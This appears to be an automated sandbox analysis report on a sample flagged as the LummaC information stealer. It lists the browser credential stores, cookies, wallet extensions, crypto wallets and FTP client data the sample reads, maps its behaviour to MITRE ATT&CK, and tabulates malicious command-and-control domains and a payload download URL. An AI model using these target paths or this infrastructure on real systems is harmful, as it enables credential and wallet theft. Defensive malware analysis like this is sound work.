                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Directory queried: C:\Users\user\Documents\DQOFHVHTMG
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Directory queried: C:\Users\user\Documents\DQOFHVHTMG
                Source: C:\Users\user\Desktop\h226x41CQ6.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
                Source: C:\Users\user\Desktop\h226x41CQ6.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: Yara matchFile source: 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1530149419.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1559608097.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: h226x41CQ6.exe PID: 7392, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: h226x41CQ6.exe PID: 7392, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (tactic: techniques, hit counts in parentheses)

• Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
• Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
• Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
• Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
• Privilege Escalation: Process Injection (111), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
• Defense Evasion: Virtualization/Sandbox Evasion (12), Process Injection (111), Deobfuscate/Decode Files or Information (1), Software Packing (1), DLL Side-Loading (1), Steganography
• Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
• Discovery: Query Registry (1), Security Software Discovery (131), Virtualization/Sandbox Evasion (12), Process Discovery (1), File and Directory Discovery (1), System Information Discovery (22)
• Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
• Collection: Data from Local System (41), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
• Command and Control: Encrypted Channel (1), Ingress Tool Transfer (2), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels, Multiband Communication
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
• Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph (ID: 1600405, Sample: h226x41CQ6, Start date: 27/01/2025, Architecture: WINDOWS, Score: 100)

• Start: h226x41CQ6.exe started; DNS/IP nodes itsrevolutionmagnus.xyz and platformcati.sbs
• Signatures at start: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 6 other signatures; Performs DNS queries to domains with low reputation (itsrevolutionmagnus.xyz)
• h226x41CQ6.exe (parent process): Injects a PE file into a foreign processes; LummaC encrypted strings found; starts h226x41CQ6.exe (child) and WerFault.exe
• h226x41CQ6.exe (child process): connects to platformcati.sbs (104.21.112.1, port 443, local ports 49702 and 49703, CLOUDFLARENETUS, United States); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; 2 other signatures
• WerFault.exe: dropped file C:\ProgramData\Microsoft\...\Report.wer (Unicode)

Source | Detection | Scanner | Label
h226x41CQ6.exe | 79% | Virustotal |
h226x41CQ6.exe | 87% | ReversingLabs | Win32.Trojan.Multiverze
h226x41CQ6.exe | 100% | Avira | HEUR/AGEN.1305290
h226x41CQ6.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
qualifielgalt.sbs | 100% | Avira URL Cloud | malware
https://platformcati.sbs/apieI | 100% | Avira URL Cloud | malware
https://platformcati.sbs/S | 100% | Avira URL Cloud | malware
pioneeruyj.sbs | 100% | Avira URL Cloud | malware
https://platformcati.sbs/api? | 100% | Avira URL Cloud | malware
fightyglobo.sbs | 100% | Avira URL Cloud | malware
https://platformcati.sbs/apip | 100% | Avira URL Cloud | malware
conceptionnyi.sbs | 100% | Avira URL Cloud | malware
nervepianoyo.sbs | 100% | Avira URL Cloud | malware
https://itsrevolutionmagnus.xyz/ | 100% | Avira URL Cloud | malware
https://platformcati.sbs/api(w | 100% | Avira URL Cloud | malware
https://itsrevolutionmagnus.xyz/a | 100% | Avira URL Cloud | malware
smashygally.sbs | 100% | Avira URL Cloud | malware
https://itsrevolutionmagnus.xyz/Pa/ | 100% | Avira URL Cloud | malware
https://itsrevolutionmagnus.xyz/Shnnfd.exe% | 100% | Avira URL Cloud | malware
modellydivi.sbs | 100% | Avira URL Cloud | malware
platformcati.sbs | 100% | Avira URL Cloud | malware
https://itsrevolutionmagnus.xyz/Shnnfd.exe | 100% | Avira URL Cloud | malware
https://platformcati.sbs/#HX | 100% | Avira URL Cloud | malware
https://platformcati.sbs/apiz | 100% | Avira URL Cloud | malware
https://platformcati.sbs/api | 100% | Avira URL Cloud | malware
https://platformcati.sbs/api~ | 100% | Avira URL Cloud | malware
https://platformcati.sbs/ | 100% | Avira URL Cloud | malware
https://platformcati.sbs/h | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
platformcati.sbs | 104.21.112.1 | true | true | | unknown
itsrevolutionmagnus.xyz | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
qualifielgalt.sbs | true | Avira URL Cloud: malware | unknown
pioneeruyj.sbs | true | Avira URL Cloud: malware | unknown
fightyglobo.sbs | true | Avira URL Cloud: malware | unknown
conceptionnyi.sbs | true | Avira URL Cloud: malware | unknown
nervepianoyo.sbs | true | Avira URL Cloud: malware | unknown
modellydivi.sbs | true | Avira URL Cloud: malware | unknown
smashygally.sbs | true | Avira URL Cloud: malware | unknown
platformcati.sbs | true | Avira URL Cloud: malware | unknown
https://platformcati.sbs/api | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/ | h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1279584582.0000000001266000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://platformcati.sbs/apieI | h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.entrust.net03 | h226x41CQ6.exe | false | | high
http://ocsp.entrust.net02 | h226x41CQ6.exe | false | | high
https://platformcati.sbs/apip | h226x41CQ6.exe, 00000004.00000003.1595467129.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1618718716.00000000012D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://platformcati.sbs/S | h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://x1.c.lencr.org/0 | h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/ts1ca.crl0 | h226x41CQ6.exe | false | | high
https://itsrevolutionmagnus.xyz/ | h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://platformcati.sbs/api? | h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://platformcati.sbs/api(w | h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://itsrevolutionmagnus.xyz/Shnnfd.exe% | h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://platformcati.sbs/#HX | h226x41CQ6.exe, 00000004.00000002.1632344310.000000000122D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://itsrevolutionmagnus.xyz/a | h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.entrust.net/rpa03 | h226x41CQ6.exe | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdve | h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aia.entrust.net/ts1-chain256.cer01 | h226x41CQ6.exe | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.10.dr | false | | high
https://www.amazon.com/?tag=admarketus-20&r | h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://itsrevolutionmagnus.xyz/Pa/ | h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/5xx-error-landing | h226x41CQ6.exe, 00000004.00000003.1276217252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e | h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://itsrevolutionmagnus.xyz/Shnnfd.exe | h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://platformcati.sbs/apiz | h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001247000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://platformcati.sbs/h | h226x41CQ6.exe, 00000004.00000003.1293612240.00000000012BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
